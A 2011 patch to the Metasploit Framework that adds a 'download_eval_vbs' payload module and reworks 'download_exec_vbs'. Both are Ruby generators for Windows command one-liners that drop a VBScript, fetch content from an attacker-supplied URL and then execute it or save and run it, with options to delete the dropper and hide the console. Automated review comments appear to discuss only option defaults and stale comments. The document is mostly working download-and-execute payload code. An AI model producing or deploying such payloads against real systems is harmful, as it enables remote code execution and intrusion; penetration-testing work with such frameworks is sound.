From 5faaa7db0719306f92afce97c4bb4e879eeb9333 Mon Sep 17 00:00:00 2001
From: Matt Weeks
Date: Sat, 11 Jun 2011 20:37:08 +0000
Subject: [PATCH] Update cmd vbs download payloads. Use : instead of longer echo statements. Add eval version.
git-svn-id: file:///home/svn/framework3/trunk@12912 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../singles/cmd/windows/download_eval_vbs.rb | 69 +++++++++++++++++++
 .../singles/cmd/windows/download_exec_vbs.rb | 30 ++++----
 2 files changed, 87 insertions(+), 12 deletions(-)
 create mode 100644 modules/payloads/singles/cmd/windows/download_eval_vbs.rb
diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
new file mode 100644
index 0000000000..da216cf1f7
--- /dev/null
+++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
@@ -0,0 +1,69 @@
+# $Id$
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Windows .vbs Download and execute',
+ 'Version' => '$Revision$',
+ 'Description' => 'Downloads a file from an HTTP(S) URL and executes it as a vbs script.
+ Use it to stage a vbs encoded payload from a short command line. ',
+ 'Author' => 'scriptjunkie',
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::None,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+
+ register_options(
+ [
+ OptString.new('URL', [ true, "The pre-encoded URL to the script" ]),
+ OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
+ OptBool.new('DELETE', [ true, "Delete created .vbs after download", false ])
+ ], self.class)
+ end
+
+ def generate
+ return super + command_string
+ end
+
+ def command_string
+ # Keep variable names short.
+ vbsname = Rex::Text.rand_text_alpha(1+rand(2))
+ xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
+
+ command = ''
+ command << "cmd.exe /q /c " if datastore['INCLUDECMD']
+ command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
+ "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
+ "#{xmlhttpvar}.Send:"+
+ "Execute #{xmlhttpvar}.responseText"
+ command << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
+
+ # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
+ # disappears quickly before the wscript libraries load and the file downloads
+ command << " >#{vbsname}.vbs"+
+ "&start #{vbsname}.vbs"
+ end
+end
diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb
index a6f05afb6b..e23f918c35 100644
--- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb
+++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb
@@ -37,7 +37,10 @@ module Metasploit3
 register_options(
 [
- OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
+ OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]),
+ OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]),
+ OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
+ OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ])
 ], self.class)
 end
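Review bot: The DELETE option in this new module defaults to false, while the same option added to download_exec_vbs.rb in this commit defaults to true, and nothing in either option description or the commit message says why the two modules differ. If the difference is deliberate it should be recorded next to the option, e.g. `# DELETE defaults to false here; download_exec_vbs.rb defaults it to true`, and if it is not, the defaults should be aligned. The 'Description' string above also says only "Downloads a file ... and executes it as a vbs script" and could mention that the DELETE and INCLUDECMD options control the generated command, since the option list is the only place that behaviour is visible.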
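Review bot: Adding INCLUDECMD with a default of false changes this module's existing default output without saying so: the line removed in the next hunk shows the generated command previously always began with `cmd.exe /q /c `, and after this commit that prefix is emitted only when the option is set. Neither the option description nor the commit message records the change, so existing users of the module will get a different default command. Suggest making it explicit in the description, e.g. `OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c prefix (was always included before this option existed)", false ])`, or defaulting the option to true to preserve the old behaviour. The enclosing initialize method starts before this hunk.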
@@ -52,18 +55,21 @@ module Metasploit3
 xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
 streamvar = Rex::Text.rand_text_alpha(1+rand(2))
+ command = ''
+ command << "cmd.exe /q /c " if datastore['INCLUDECMD']
 # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
 # disappears quickly before the wscript libraries load and the file downloads
- "cmd.exe /q /c echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\") >#{vbsname}.vbs"+
-"&echo #{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False >>#{vbsname}.vbs"+
-"&echo #{xmlhttpvar}.Send >>#{vbsname}.vbs"+
-"&echo Set #{streamvar}=CreateObject(\"ADODB.Stream\") >>#{vbsname}.vbs"+
-"&echo #{streamvar}.Type=1 >>#{vbsname}.vbs"+
-"&echo #{streamvar}.Open >>#{vbsname}.vbs"+
-"&echo #{streamvar}.Write #{xmlhttpvar}.responseBody >>#{vbsname}.vbs"+
-"&echo #{streamvar}.SaveToFile \"%tmp%\\#{exename}.exe\",2 >>#{vbsname}.vbs"+
-"&echo CreateObject(\"WScript.Shell\").Run \"%tmp%\\#{exename}.exe\" >>#{vbsname}.vbs"+
-"&echo CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\" >>#{vbsname}.vbs"+
-"&start #{vbsname}.vbs"
+ command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
+ "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
+ "#{xmlhttpvar}.Send:"+
+ "Set #{streamvar}=CreateObject(\"ADODB.Stream\"):"+
+ "#{streamvar}.Type=1:"+
+ "#{streamvar}.Open:"+
+ "#{streamvar}.Write #{xmlhttpvar}.responseBody:"+
+ "#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:"+
+ "CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":"
+ command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
+ command << " >#{vbsname}.vbs"+
+ "&start wscript #{vbsname}.vbs"
 end
 end
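Review bot: The last added line launches the script with `start wscript #{vbsname}.vbs`, while the eval module created in this same commit ends with `start #{vbsname}.vbs`; the two modules now diverge on this point with no comment explaining why. The two context comment lines kept above the removed block were written for the old form and talk about "the wscript libraries" loading, so they no longer explain the explicit invocation either; a one-line comment such as `# wscript is named explicitly here; download_eval_vbs.rb relies on the default .vbs handler` (or aligning the two modules) would remove the ambiguity. The enclosing command_string method, and the assignments of vbsname and exename it relies on, start before this hunk.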